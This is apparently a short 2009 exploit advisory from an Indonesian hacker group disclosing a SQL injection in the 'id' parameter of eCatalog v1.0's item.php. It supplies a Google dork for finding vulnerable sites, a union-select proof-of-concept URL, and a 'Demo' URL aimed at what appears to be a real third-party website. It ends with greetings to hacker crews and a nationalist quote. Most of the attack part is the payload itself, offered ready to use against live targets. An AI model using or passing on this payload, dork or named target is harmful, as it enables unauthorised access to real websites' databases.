#############################################################
## eCatalog Software - item.php?id   	     		   ##
## Author : Don Tukulesto (tukulesto[at]hackermail[dot]com)##
## Homepage : http://www.indonesiancoder.com    	   ##
## Date : Sunday, August 30, 2009 			   ##
#############################################################

[ Software Information ]

[+] Software : eCatalog v1.0
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:item.php?id "eCatalog"

#############################################################

[ POC ]

http://127.0.0.1/item.php?id=[ID]+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

[ID] = Valid ID

[ Demo ]

http://www.ibcom.com.my/catalog/item.php?id=-493+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15--

#############################################################

[ Greetings ]

[~] All of Indonesian Coder Member, mistersaint, gonzhack, m364tr0n, m3nw5, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[~] All of Surabayahackerlink Member, bejat Bejat, Plaque, rey_cute, Tuex, XNITRO, DraCoola
[~] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu, eminem
[~] Kill-9 crew, kaMtiEz, arianom, tiw0L, Pathloader, RoNz dan kalian semua.

[ QUOTE ]

Wahai kau MALINGSIAL, Jangan kau coba ganggu kami.
Kami bangsa INDONESIA siap sedia membela negara kami INDONESIA.